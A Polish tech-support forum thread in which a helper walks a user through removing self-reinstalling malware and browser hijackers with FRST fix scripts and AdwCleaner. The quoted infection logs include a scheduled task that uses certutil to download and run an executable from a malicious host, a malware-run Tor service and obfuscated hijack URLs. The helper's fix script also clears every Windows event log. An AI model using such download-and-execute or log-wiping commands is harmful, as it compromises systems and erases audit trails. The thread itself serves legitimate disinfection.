Samoinstralujące się malware

[xMafiozAx]

Witam, od wczoraj w systemie pojawiły się dziwne malware które same się instalują, dodatkowo zmieniają ustawienia w przeglądarce, a wyłączenie ich w procesach menadżera zadań nie daje efektów. Próbowałem usuwać foldery zawierające te pliki, ale to restarcie systemu pojawiają się one na nowo. Jeden z programów (CloudNet) odinstalowałem z panelu sterowania (Programy i funkcje) ale też nie przyniosło to efektów. Załączam skan z FRST.

Addition.txt

FRST.txt

Shortcut.txt

[jessica]

1) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Task: {4600FA77-1D45-4116-975F-9B2ADD20CDB1} - System32\Tasks\MRT => C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe [2018-05-22] () <==== UWAGA
Task: {47C5BB9A-FCB4-477E-844D-18572951D8A9} - System32\Tasks\{56587220-312E-41C2-8F2C-2A86F3DA23AF} => C:\Windows\system32\pcalua.exe -a "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche\heroes_might_magic_5_3.01_pl.exe" -d "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche"
Task: {ABDB4510-54FD-476C-97F9-8E68A1BFB964} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-21] () <==== UWAGA
Task: {BDF11CB4-5603-408F-B9B3-36B5804EE85F} - System32\Tasks\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Doublebam\uninstall.exe" -d "C:\Program Files (x86)\Common Files\Doublebam"
Task: {C8B15871-9EBF-4859-B0D4-2D6951174F51} - System32\Tasks\vgokv => C:\Users\Bartek\AppData\Roaming\zmzol\vgokv.vbs [2018-05-21] ()
Task: {F1AA8920-6EFA-400E-B69E-BC88E72E1BF7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\GeForce Experience Stream Client.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=gjljknijpnfibppaijefibndmiabonep
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
2018-05-21 14:17 - 2018-05-21 14:17 - 001377280 ____H () C:\Windows\windefender.exe
2018-05-21 14:17 - 2018-05-21 14:17 - 003173376 _____ () C:\Windows\rss\csrss.exe
2018-05-22 14:30 - 2018-05-22 14:30 - 001484800 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe
2018-05-22 14:25 - 2018-05-22 16:22 - 001042432 _____ () C:\Users\Bartek\AppData\Local\Temp\wup\wup.exe
FirewallRules: [{2ACB2E51-F44F-4B45-86EB-036C715673A1}] => (Allow) C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{C9F64007-2362-4FDC-8AB9-A760F4710803}] => (Allow) C:\Windows\rss\csrss.exe
HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Run: [DampField] => C:\Windows\rss\csrss.exe [3173376 2018-05-21] () <==== UWAGA
HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Run: [CloudNet] => C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-22] (EpicNet Inc.)
AppInit_DLLs: C:\ProgramData\Quoteex\PhysTrax.dll => Brak pliku
AppInit_DLLs-x32: C:\ProgramData\Quoteex\Keytech.dll => Brak pliku
RemoveDirectory: C:\Users\Bartek\AppData\Roaming\zmzol
RemoveDirectory: C:\Users\Bartek\AppData\Roaming\EpicNet Inc
RemoveDirectory: C:\ProgramData\Quoteex
RemoveDirectory: C:\ProgramData\yahoochrome_D
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms}
HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldA6aBH6SIyVUPUh0wIUYP-LrkzKT5owTrePODdncsK8256r86EEWsnA0mQHR4-cGWxQKLkSYc_r8Ka08qQPHOnoG7wNw,,
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-360975752-3786565279-1083807947-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-360975752-3786565279-1083807947-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYoyDn3q68ALnTQQwq7elzZwgmnz37qXoKhUCvHsN1GiZZCF3m4prTM0mR0VaGpCldMNZ2yT4d0dQ-2XtvxvzBOfgsX2V7Wo8kvXF6diHO8ce3R6fmB01wcrP3yuOlyBsZrAfH4BM1jAIVRFwUG6cUutR_PWg,,&q={searchTerms}
CHR Extension: (Bazz Search) - C:\Users\Bartek\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-21]
R2 WinDefender; C:\Windows\windefender.exe [1377280 2018-05-21] ()
S2 backlh; C:\ProgramData\Logic Cramble\set.exe [X] <==== UWAGA
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Quoteex; C:\ProgramData\\Quoteex\\Quoteex.exe shuz -f "C:\ProgramData\\Quoteex\\Quoteex.dat" -l -a <==== UWAGA
S2 saiyitechnology; C:\ProgramData\yahoochrome_D\desktop215.exe [X]
R2 TCPSvc; "C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\tor.exe" --nt-service --SocksPort 7050 --Log "notice file C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\t" <==== UWAGA
2018-05-21 14:17 - 2018-05-21 14:17 - 000000000 ___HD C:\Windows\rss
2018-05-21 14:16 - 2018-05-21 14:17 - 000015606 _____ C:\Windows\SysWOW64\findit.xml
2018-05-21 14:16 - 2018-05-21 14:16 - 007611392 _____ C:\Users\Bartek\AppData\Local\agent.dat
2018-05-21 14:16 - 2018-05-21 14:16 - 001987035 _____ C:\Users\Bartek\AppData\Local\Vaiaquophase.tst
2018-05-21 14:16 - 2018-05-21 14:16 - 001895382 _____ C:\Users\Bartek\AppData\Local\X-find.bin
2018-05-21 14:16 - 2018-05-21 14:16 - 000278508 _____ C:\Users\Bartek\AppData\Local\Toneco.tst
2018-05-21 14:16 - 2018-05-21 14:16 - 000126464 _____ C:\Users\Bartek\AppData\Local\noah.dat
2018-05-21 14:16 - 2018-05-21 14:16 - 000070896 _____ C:\Users\Bartek\AppData\Local\Config.xml
2018-05-21 14:16 - 2018-05-21 14:16 - 000018432 _____ C:\Users\Bartek\AppData\Local\Main.dat
2018-05-21 14:16 - 2018-05-21 14:16 - 000005568 _____ C:\Users\Bartek\AppData\Local\md.xml
2018-05-21 14:16 - 2018-05-21 14:15 - 002136576 _____ (TODO: <Company name>) C:\Users\Bartek\AppData\Local\Vaiaquophase.exe
2018-05-21 14:16 - 2018-05-21 14:15 - 002136576 _____ (TODO: <Company name>) C:\Users\Bartek\AppData\Local\Toneco.exe
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

2) Użyj >https://www.fixitpc.pl/topic/8-dezynfekcja-zbi%C3%B3r-narz%C4%99dzi-usuwaj%C4%85cych/?do=findComment&comment=172741

Adw-cleaner
najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk OCZYŚĆ (CLEANING), to kliknij na niego.
Pokaż raport z niego "C"

 

3) Zrób nowe logi FRST.

przed skanem zaznacz: Additional.txt Shortcut.txt,

 

jessi

[xMafiozAx]

Proszę

Addition.txt

Fixlog.txt

FRST.txt

Shortcut.txt

AdwCleanerC00.txt

[jessica]

1) Spróbuj odinstalować ten program:

SafeFinder (HKLM-x32\...\{DAEBEC7B-840B-42CA-A61E-90AF801F52BE}) (Version: 1.0.0.0 - Linkury) <==== UWAGA

 

2)

CHR res: Zainfekowany resources.pak (Adware script). Przeinstaluj Chrome. <==== UWAGA

Przeinstaluj Google Chrome.

 

3) Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

RemoveDirectory: C:\ProgramData\Quoteexs
RemoveDirectory: C:\Program Files (x86)\1lxripqvkmk
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DAEBEC7B-840B-42CA-A61E-90AF801F52BE}
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{DAEBEC7B-840B-42CA-A61E-90AF801F52BE}
ContextMenuHandlers1-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku
ContextMenuHandlers6-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku
FirewallRules: [{ED8C657A-C198-4668-B280-8D36675729C5}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{3151119A-AF62-43A9-B2CC-9F00BF07776A}] => (Allow) C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FF NewTab: Mozilla\Firefox\Profiles\oy1dvr35.default-1506107866360 -> C:\ProgramData\Quoteexs\ff.NT
CHR Extension: (Bazz Search SafeFinder) - C:\Users\Bartek\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2018-05-21]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [brak pliku]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll [brak pliku]
C:\Users\Bartek\Downloads\atpazghsruv.txt
C:\Users\Bartek\Downloads\ejvslivxopsywb.txt
C:\Windows\Minidump\*.dmp
C:\Users\Bartek\AppData\Local\installer.dat
C:\Users\Bartek\AppData\Local\uninstall_temp.ico
C:\Users\Bartek\Desktop\Crossout - MMO action game.lnk
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

 

4) 

Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)

zainstaluj nowszą wersję Javy, wg https://www.fixitpc.pl/topic/5-dezynfekcja-kroki-finalizuj%C4%85ce-temat/?do=findComment&comment=179769

 

5) Zrób nowe logi FRST - juz bez Shortcut.

 

jessi